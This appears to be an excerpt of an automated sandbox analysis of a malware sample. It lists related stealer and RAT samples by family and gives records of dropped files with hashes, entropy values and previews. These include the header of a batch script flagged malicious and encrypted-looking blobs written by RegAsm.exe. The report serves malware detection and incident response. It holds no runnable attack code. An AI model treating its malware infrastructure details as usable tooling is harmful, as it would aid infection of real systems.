                                            file.exeGet hashmaliciousUnknownBrowse
                                              vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                    file.exeGet hashmaliciousRemcosBrowse
                                                      pennicle.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                        SolPen.exeGet hashmaliciousLummaC StealerBrowse
                                                          C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exec2.htaGet hashmaliciousXWormBrowse
                                                            c2.htaGet hashmaliciousXWormBrowse
                                                              OR8Ti8rf8h.exeGet hashmaliciousAveMaria, DcRat, StormKitty, VenomRATBrowse
                                                                RFQ-004282A.Teknolojileri A.S.exeGet hashmaliciousAgentTeslaBrowse
                                                                  c2.htaGet hashmaliciousXWormBrowse
                                                                    c2.htaGet hashmaliciousXWormBrowse
                                                                      PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                        P0J8k3LhVV.exeGet hashmaliciousNanocoreBrowse
                                                                          NIENrB5r6b.exeGet hashmaliciousXWormBrowse
                                                                            DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                              Process:C:\Windows\System32\wscript.exe
                                                                              File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):17946
                                                                              Entropy (8bit):5.068311467768946
                                                                              Encrypted:false
                                                                              SSDEEP:192:BdSzVh0cBCm8wi2cA8UlUwrH1c8HsW3JRzD841f8tuqKVYB3rP7TXfIpFpt/kK+Z:BdSzEUCm8wi2l8UpL1FzQ41GrJ7IvGr
                                                                              MD5:099268C6CCB11DB81E4A455AB3E20002
                                                                              SHA1:17303211AD7B31AD3821FE311559713D5C638A7B
                                                                              SHA-256:9B295000F29AD57EF010FF7C845B1A62715D706042B47F25714BEA45F3807FF2
                                                                              SHA-512:20F46066620F86DA33D5424B4D67D6BE45CBE45531AF97A9C3D0D274109576418427D3305D3C293DE79DEAE2D27AB6EA2D2C5CD68CBE2833564E1E6CF6017BE5
                                                                              Malicious:true
                                                                              Preview: : Begin of batch script..@echo off..setLocal EnableExtensions..setlocal EnableDelayedExpansion..:: _ _..:: _ | | _ | | _..:: ____ _ _| |_ ___ _ _ ____ _ | | ____| |_ ____ | | _ ____| |_..:: / _ | | | | _)/ _ \| | | | _ \ / || |/ _ | _)/ _ ) | || \ / _ | _)..:: ( ( | | |_| | |_| |_| | |_| | | | ( (_| ( ( | | |_( (/ / _| |_) ( ( | | |__..:: \_||_|\____|\___\___/ \____| ||_/ \____|\_||_|\___\____(_|____/ \_||_|\___)..:: |_|..::..:: Automatic RDP Wrapper installer and updater v.1.2 asmtron (2024-29-03)..:: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~..:: Options:..:: -log = redirect display output to the file autoupdate.log..:: -taskadd = add autorun of autoupdate.bat on startup in schedule task..:: -taskremove = remove autorun of autoupdate.bat on startup in schedule task..::..:: Info:..::
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2232
                                                                              Entropy (8bit):5.379457704019818
                                                                              Encrypted:false
                                                                              SSDEEP:48:FWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MvUyus:FLHxvIIwLgZ2KRHWLOug8s
                                                                              MD5:DDD86E57C2B793C068C5FE78F119F485
                                                                              SHA1:342F7D6AA0A466C5B3EE7BFDE03536A2E4B5A932
                                                                              SHA-256:86CDA7EDDE646426291B5253B47DCCA13508C17649A9EA36CF5D5BA531AA94C7
                                                                              SHA-512:89F314BF3CB5A266E046F376B9C7F4F72AAE0B883CEA019917A31C4AD83A243F8249C60C8406040E84972A2DFA7C8D71A5A962D084BB99544BF8DC9F38A79BA1
                                                                              Malicious:false
                                                                              Preview:@...e.................................*..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1332
                                                                              Entropy (8bit):7.434254734798644
                                                                              Encrypted:false
                                                                              SSDEEP:24:n0wfqc0uk8YWtXwsEpuB8Cu9YPp3XAjafZ4e2zol5BdFyvLZ3XngeI+Uc5oz:0WidWtXw/pnC8YPdXAjaf2EnSLZA7+UJ
                                                                              MD5:F9A790C0B11119359C3876592D16987D
                                                                              SHA1:74A525B9A4E56B50A87D205137ACCC7CE67C5EC3
                                                                              SHA-256:931F4232FA881AF9927E361F997BAC1311E6F1D398667D9AE33324749D9A6A5A
                                                                              SHA-512:987258C0D6FE0AE626387CF62AD273D95BF8D51FCB54E8F4C61FAC89B931A3E0012E5446C2D0F57839B7DF0F3F67D0EE7D39B95008F388061AD206D0962106CA
                                                                              Malicious:false
                                                                              Preview:EA06.....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l*.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..$.`...a.Z...H..o.Z..:|.u ..n.......b.YlwID..c.Zn.@..\....7;....9...T......+.....S2....@#@.}K$.K.......f]W.Zn.Y..j.+....s..t`.h.........l.\.....,.\.g....@ K=...8J@I.p.=.mtKM.Qa..$........-..... ".h.....nW..... .(.~.....AU.[.. . ........J-2.H.!a.....H.V....x.t.*./.p...x....S=.........i..+w[...n..l...n.a........,..bU...H..X. .y.J@.3,.U.9.....[m..t...2...\..r....y.J.g...*K...l........"...@.....V.u..v.+.Wd@........R{ .[.6.E..r..@0y .O'..m.Av..`.$.E"...)...n.../...U.Q.....E?.H...,.7*............e....Z..K.._/....[m.....lw+}..f.K.v.l..i.c..9|.a0.K..)}..t...........O*.+M.......2....m.....s.....K-.......... ye.].6..B.1..%....,..wK}.t.]nV......Y.6..y/...@">Yx.O...XnW@+X.h.L....c0....I..u0.N....T.
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1308
                                                                              Entropy (8bit):7.455822971727304
                                                                              Encrypted:false
                                                                              SSDEEP:24:nEwfqc0uk8YWtXwsEpuB8Cu9YD7T2aZz3FZOq20HmeyfPNVYY6fJW1fvOwDdqN:EWidWtXw/pnC8YqaVx2wmnPoFfJgew+
                                                                              MD5:D17CD7F607D704BE6ABF54DF45E96016
                                                                              SHA1:CDD69E1ECEF102294F4787A8DD89FB5A86EAA3AF
                                                                              SHA-256:1A1116AAB11ED203E9013541E2D5A06E33A8A95CF25F07A09E68E82E840C572C
                                                                              SHA-512:C8C15B0236467039C941F0773CECA0C7C281D0521E905F78DF6FC520F48436DDACDC18D75A91F14F89800B0BEF0AE00D2337ABF78B41CC14C9D45AEBE305392A
                                                                              Malicious:false
                                                                              Preview:EA06....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l*.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..$.`...a.Z...H..o.Z..:|.u ..n.......b.YlwID..c.Zn.@..\....7;....9...T......+.....S2....@#@.}K$.K.......f]W.Zn.Y..j.+....s..t`.h.........l.\.....,.\.g....@ K=...8J@I.p.=.mtKM.Qa..$........-..... ".h.....nW..... .(.~.....AU.[.. . ........J-2.H.!a.....H.V....x.t.*./.p...x....S=.........i..+w0..p.s+....g.. ...H*....PnV{...n.\...H...@....i.[...e..o....]G.[.@q......@t.....p....z.]......>.u@......)V.M.QA.\.7..nH$S....l.]..+...=.H.2.E ..v. ..."Uj.il.m".O.. .}K.....k.7.&@...Yn........:...v;E..a.......s......./..@...._2.L&...._m..%.@..E".b.$....g..1......d..l.........'..t.....(....YnWk..}P.Li..x.~..>z...p..(.[...=..'.k...e.K..~P...^....-.....j..'.)..s-..%.9.Ra5.L&S......#....E.XlV.-.}t..'....
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1292
                                                                              Entropy (8bit):7.456605818205988
                                                                              Encrypted:false
                                                                              SSDEEP:24:n1wfqc0uk8YWtXwsEpuB8Cu9YDEQ95SLzrCQt48Ksr0HyDX9hXKSOG7OaD2/:1WidWtXw/pnC8YoISLx48oHyDXbXpZ2/
                                                                              MD5:B36F2C60F18124097F22CA30DA0DC30D
                                                                              SHA1:4B66D215B94A6418CE027AAC79A94E2CDB1D70AC
                                                                              SHA-256:F1B3B7B1FCB7E4A8CFA6300066057BF6C55F2AE0F3365F8481EE8F930263B6DB
                                                                              SHA-512:43A781EE27C1D3540F5DF960499FE0FB7408C709D322D1DC6F059E64FE2ACE3A9682DCE8F552BCE4C3A4720EAF35E81F9D331E080BDE9B6ED6606FC2F7C11059
                                                                              Malicious:false
                                                                              Preview:EA06.....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l*.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..$.`...a.Z...H..o.Z..:|.u ..n.......b.YlwID..c.Zn.@..\....7;....9...T......+.....S2....@#@.}K$.K.......f]W.Zn.Y..j.+....s..t`.h.........l.\.....,.\.g....@ K=...8J@I.p.=.mtKM.Qa..$........-..... ".h.....nW..... .(.~.....AU.[.. . ........J-2.H.!a.....H.V....x.t.*./.p...x....S=.........i..+w0..p.s+.)H..e.....a..*....PnV{...n.\..."Q0......\.......y.J.g...%...l.....\."..K-....W+u..r.]..+. .|\....)=.R...t.......H..... .YnW0.r{".Le....Ae.X..@...D..(...E"..@......K....o.L......s..-.K..u/...v.-..s.[m6;...o.]%.;}._w....{..e0.M%.....i.K...D...H'.K...g.b.......i..@.r.9...P..i..@.~P........d..T..'......|.;...A.Q..+..z."O...e..<.......,..'..[,7+.....O.S...[1.Kfs...k:.L.S...*.G..?..n...[$....
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1684
                                                                              Entropy (8bit):7.50889167794876
                                                                              Encrypted:false
                                                                              SSDEEP:24:nVuwfqc0uk8YWtdFxDOFM+fER+WdAFUwUMneTqGnVeva5IKxhDGzGokYpxv71X0:4WidWtdFlOS+o+A2xUMnMH+EDJ6pt6
                                                                              MD5:992B1C2F7AD4FB50ABC99643F40DADF4
                                                                              SHA1:38FFBFB56D0981BF689664AA279C4CC0D90500C6
                                                                              SHA-256:D43A2B171FBE2A0A0EF19D42E4A86B98D7804CB1D566CC24C5C7B28053D0DA10
                                                                              SHA-512:5E418C5B6F326A64848AC81B73B04FA51B066710E6C6AB1E7CB14EEF7639681A48344150307B8B1A09AA0DAC8A4DD65D4939E77FBC6D8FB7F22D144C26A2B68B
                                                                              Malicious:false
                                                                              Preview:EA06.....]m.;...n.T.6.%..S.\.6.<.AB..6....r.Ym..L6. ..(..h..,.[m6..R.x...qC..wI.2.T.QjU9..A"..vK-..h..v.m..p..wK...x......i5.M.........."b......4.s%.....1..{....?.k}.Ai.8d.Kx.6@.p......`.3&.Sm6I@....M..(..2...bW1..V.$..,....@.\.......Dp...l*.n.H.L..6.aU;..AC.Yl7K-P..Zm.YE..d..'.....b.Q.t...AS....u=.1.>.j....N.r..........nwK-..s. ...o..,..%^..YK.7+=..e.].r.H.i(...`..@..........p._i .`..e.....e..@.s...7K,..).....o..@Ap....`..vkuJ.p.J.t.d..P.H.`7...[ ....X..% (.8...%..(.....X....n...n@.......El7+...v.....S..R. ...[u.......Y..%..L......@....@.....:.....8.J...R..)..efA_.e.N.l..V.....r.Xm.Z.p...w{}..].J@..L.AA.\.7.@...0............Eb....06.e..*V[=...p\..{e....O@{ ...a.].$.;..[.....]..#..T.H..I.o........E@.Ylv.|..f.H...,.H.v[...c....>).....\..;M.{".T..l.[3.Kf.I..D.W....}.._.*@.~Y.....\+..}..=...`.....".]......Y.V...Aw.YnVY...%...Ag.-.f....a.]l..........K%..i...%...Ki..]..8..%._d....S .[......l.=.........y..._.vg.P.fJ.Q.................o...o..m..1...|`d
                                                                              Process:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1992
                                                                              Entropy (8bit):7.5426647205821595
                                                                              Encrypted:false
                                                                              SSDEEP:48:xlU3+FL9vAMDy1Ql3U0ClWp149/KGuqHEGUFQ2hhfkkaH:DUcKmmvlu4OqHX+XaH
                                                                              MD5:41BF21000996D9BF916A0058DC2AB0A8
                                                                              SHA1:AB03EC108844D43061F7316ECAA81F0015F61E1C
                                                                              SHA-256:66BBF86AD5448C4EA69C0BA304F763E62441C6EFD2CC4AC3BF99529C82570FEC
                                                                              SHA-512:8F6DB0E8503E4CFAEF3774325BCBB9C62691CF8D0B5B157A32217A6A14CA03516E1428473D8B09B246DD807FDA2CEE78AEA40AD071DB84BD0976012622E59457
                                                                              Malicious:false
